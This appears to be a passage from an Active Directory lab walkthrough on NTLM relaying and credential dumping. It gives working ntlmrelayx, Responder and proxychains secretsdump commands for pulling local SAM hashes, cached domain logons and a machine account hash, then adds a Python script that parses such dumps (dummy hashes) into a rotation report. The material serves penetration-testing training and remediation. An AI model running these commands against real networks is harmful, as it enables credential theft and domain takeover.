Secretsdump

Use secretsdump to get the SAM database, the LSA cached logons, the machine account and some DPAPI information

Run ntlmrelayx.py and wait for a connection from fernando.alonzo

sudo ntlmrelayx.py -socks -smb2support -tf unsigned_smb.txt

Run Responder

sudo responder -I enp0s3

Dump the SAM database

proxychains secretsdump -no-pass 'NORTH'/'fernando.alonzo'@'192.168.56.22'

  • The SAM database contains the local accounts. We will ignore vagrant as it is the default user used to set up the lab.

  • The important information here is the NT hash of the local Administrator user.

  • We also got the LSA cache of the last logged-on users (by default Windows keeps the last 10). These cached credentials let a user log on to the server even when the domain controller is unreachable. They can be cracked offline with hashcat, but very slowly.

  • Finally, we also got the hash of the computer account. (Sometimes you get no useful domain accounts, or no information at all, on a domain-joined computer, but with this hash you have an account on the domain!)
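To turn the four findings above into a report, here is an added triage script (not from this page and not part of impacket) that walks a secretsdump dump section by section, sorts each credential line into SAM / cached logon / machine account, skips the lab's vagrant user, and lists which accounts have to be rotated. The sample dump it parses is constructed: the section headers follow impacket's output layout as I know it, NORTH.EXAMPLE.LOCAL and WORKSTATION01 are placeholder names, and every hash value is a dummy, not a real credential.

```python
import re
from dataclasses import dataclass

# The LM half of every hash is this constant when LM hash storage is off (the default).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
# Lab-provisioning account the walkthrough says to ignore in the SAM listing.
IGNORED_LOCAL_USERS = {"vagrant"}

# Line shapes printed under each section (assumed from impacket's secretsdump output format).
SAM_RE = re.compile(r"^(?P<user>[^:\\/]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$")
# Cached logons: DOMAIN/user:$DCC2$<iterations>#user#<hash>; trailing text after the hash is ignored.
DCC2_RE = re.compile(r"^(?P<domain>[^/]+)/(?P<user>[^:]+):\$DCC2\$(?P<iters>\d+)#[^#]+#(?P<hash>[0-9a-f]{32})")
# Machine account: DOMAIN\HOST$:lmhash:nthash:::
MACHINE_RE = re.compile(r"^(?P<domain>[^\\]+)\\(?P<host>[^:]+\$):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$")


@dataclass
class Finding:
    category: str   # "sam", "cached" or "machine"
    account: str    # whose credential has to be rotated
    priority: str   # "high" or "medium"
    note: str       # what the exposure means, in report wording


def parse_secretsdump(text):
    """Walk the dump section by section and emit one Finding per exposed credential."""
    section = None
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[*]"):
            # Section headers decide how the lines that follow are interpreted.
            if "local SAM" in line:
                section = "sam"
            elif "cached domain logon" in line:
                section = "cached"
            elif "$MACHINE.ACC" in line:
                section = "machine"
            else:
                section = None  # bootKey, DPAPI_SYSTEM, NL$KM, cleanup chatter
            continue
        if section == "sam" and (m := SAM_RE.match(line)):
            if m["user"] in IGNORED_LOCAL_USERS:
                continue
            is_admin = m["rid"] == "500"  # RID 500 is always the built-in Administrator
            findings.append(Finding(
                "sam", m["user"], "high" if is_admin else "medium",
                "built-in local Administrator NT hash: rotate it, and on every host sharing the same password (use LAPS)"
                if is_admin else "local account NT hash (unsalted, fast to crack offline): rotate"))
        elif section == "cached" and (m := DCC2_RE.match(line)):
            findings.append(Finding(
                "cached", f"{m['domain']}\\{m['user']}", "medium",
                f"DCC2 cache entry ({m['iters']} PBKDF2 iterations, slow to crack offline): rotate the domain password"))
        elif section == "machine" and (m := MACHINE_RE.match(line)):
            findings.append(Finding(
                "machine", f"{m['domain']}\\{m['host']}", "high",
                "computer account NT hash, i.e. a valid domain identity: reset the computer account password"))
    return findings


def rotation_plan(findings):
    """Group accounts by category, high priority first, for the rotation checklist."""
    plan = {"sam": [], "cached": [], "machine": []}
    for f in sorted(findings, key=lambda f: (f.priority != "high", f.account)):
        plan[f.category].append(f"{f.account} [{f.priority}]")
    return plan


# Constructed sample dump: placeholder host/domain names and dummy hash values.
SAMPLE_DUMP = r"""
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x00000000000000000000000000000000
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333:::
[*] Dumping cached domain logon information (domain/username:hash)
NORTH.EXAMPLE.LOCAL/fernando.alonzo:$DCC2$10240#fernando.alonzo#44444444444444444444444444444444
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
NORTH\WORKSTATION01$:plain_password_hex:5555555555555555
NORTH\WORKSTATION01$:aad3b435b51404eeaad3b435b51404ee:66666666666666666666666666666666:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x7777777777777777
[*] Cleaning up...
"""

if __name__ == "__main__":
    for f in parse_secretsdump(SAMPLE_DUMP):
        print(f"[{f.priority:6}] {f.category:8} {f.account}: {f.note}")
    print(rotation_plan(parse_secretsdump(SAMPLE_DUMP)))
```

The parser is section-driven on purpose: a bare `user:rid:lm:nt:::` line means something different under the SAM header than under `$MACHINE.ACC`, and the `plain_password_hex` line of the machine account is skipped because it is not a 32-hex-character hash pair. To triage a real assessment output, pass the captured text to `parse_secretsdump` instead of `SAMPLE_DUMP`.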
